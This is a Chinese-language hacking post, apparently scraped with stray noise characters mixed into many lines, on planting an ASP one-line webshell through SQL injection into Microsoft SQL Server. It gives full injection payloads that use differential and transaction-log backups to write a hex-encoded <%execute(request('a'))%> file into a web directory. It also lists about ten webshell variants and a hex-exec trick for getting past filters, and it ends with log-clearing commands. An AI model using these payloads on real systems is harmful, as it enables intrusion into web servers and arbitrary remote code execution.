MSsql差异备份总结

admin

差异备份的流程大概这样：
1 s9 Z. E- @8 j0 e  I  r( m1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

. r8 k/ g/ O; t- }; }2.创建表并插曲入数据
5 K/ n( V, Y8 hcreate table [dbo].[dtest] ([cmd] [image]);
& t1 t9 `$ @1 Z9 `8 n! n' }; \- Minsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
% r: m4 \" r+ e. @7 S& Lbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

2 \6 _9 y9 F* L5 D3 _9 b3 d6 u上面
7 m# j( `' [) O6 z2 W+ h0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

( [1 S4 u+ `( j4 f" I% R如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
& d8 z: K0 r1 s; w) b( U' t步骤:
0 ^9 v: X6 x' m, r
: d5 T* X! c- }& v5 Fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

6 [4 I% Y% |! }6 kcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
6 y% V  j9 Z5 z4 ~6 }2 [0 R" @
; e; k" p/ P( U1 h0 b( x2 D
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
) a, i& I! b* J& ]& O, w& w
: U, }, V8 @, P3 W8 l: qdrop table [xiaolu]  -- 删除此表。
9 i% u2 P' Q/ z0 |0 m( T2 t) V5 j, ~. \
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
) R, P: j& Z4 F9 v. [& Y0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
) h' u, g4 _' ]/ I7 Y. N  M2 R
5 T$ L0 C) n; X( r) N; ~; [声明：方法不是我想的，我只是写工具，默认得到shell是
: f# I9 }, \* J* a<%execute(request("a"))%>
===============================================================

我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'
* q3 [5 R' s6 i# h" A2 J+ D2 K4 Z0 I
/ ]; L- [3 H2 X7 Fcreate table [dbo].[dtest] ([cmd] [image]);

8 a. w& j9 m! [5 y' w! E5 uinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
7 L4 u0 A2 T. B
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
" r- k2 ^# f& L: d" u3 v
2 _1 U4 B. e7 J( h7 `% @' N# i网上还有log增量备份的，我也把他记录一下
( @  W) u4 J/ U% t=====================================================
另一种log增量备份技术:
( q5 H: X; |# K6 l
& f7 ^. a  f7 U6 N1 U';alter database null set RECOVERY FULL--
' l* y1 ^) `; Z" d, G4 n+ {
';create table cmd (a image)--

6 s' _7 {, b' o7 a8 E  Q';backup log null to disk = 'f:\cmd' with init--
3 y2 x6 F  p7 L1 _$ d4 `! X
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

% `5 L! `, `6 z3 y& c% p* X' o. L3 N';backup log null to disk = '备份路径'--
9 ]" @  U" r$ [& O
';drop table cmd--
- W( `! `0 C3 C* R2 F* n! F. U
';alter database XXX set RECOVERY SIMPLE--

" i1 k' z6 n! E& kPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
; s/ y) ?, a8 O& A5 Jc)%><%execute request("a")%><%
% u9 z& K- m8 Z/ zd)<script language=VBScript runat=server>execute request("a")</script>
5 Y0 f; h- p/ `6 Xe)<%25Execute(request("a"))%25>
: y( w$ l7 }3 m$ W! cf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
6 `, j( e+ c: N  P, U2 M! `2 V- vg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
  g; V8 D  R" @# u; Z0 D  BJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
! E* Z$ M- ~! y- d3 S6 g4 g: w8 X
=============================================

. L" D% n1 d9 g  M4 N当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

把要执行的语句转16进制然后用exec执行

* X) [0 a+ t. i( Q# P! E/ o$ r
减少备份文件大小方法如下:
* ~6 u6 _/ h2 `( L9 M& k- R
总的来说就是那么简单几句,下面以备份数据库model为例子
1
8 f8 i+ b) g$ c- U; `id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
) ^1 w1 _6 \5 a; p6 Jid=1;backup database model to disk='你的路径‘ with differential,format;--
- e( {3 ~; a. V8 M

/ o- N6 V- q. W
SQL语句清理日志
注：test为数据库名
5 T- h9 O/ ~* C; ^; ^& Y8 U5 r* f
--清空日志
. m) G( n8 H- h! k8 O" JDUMP TRANSACTION test WITH NO_LOG
# a& d4 j8 C/ v( N  E( x
--截断事务日志
/ Z3 r5 F  p6 dBACKUP LOG test WITH NO_LOG

! C1 E1 E+ F3 Z' H) \--收缩数据库
: H# }) D8 l% }' T: T" DDBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'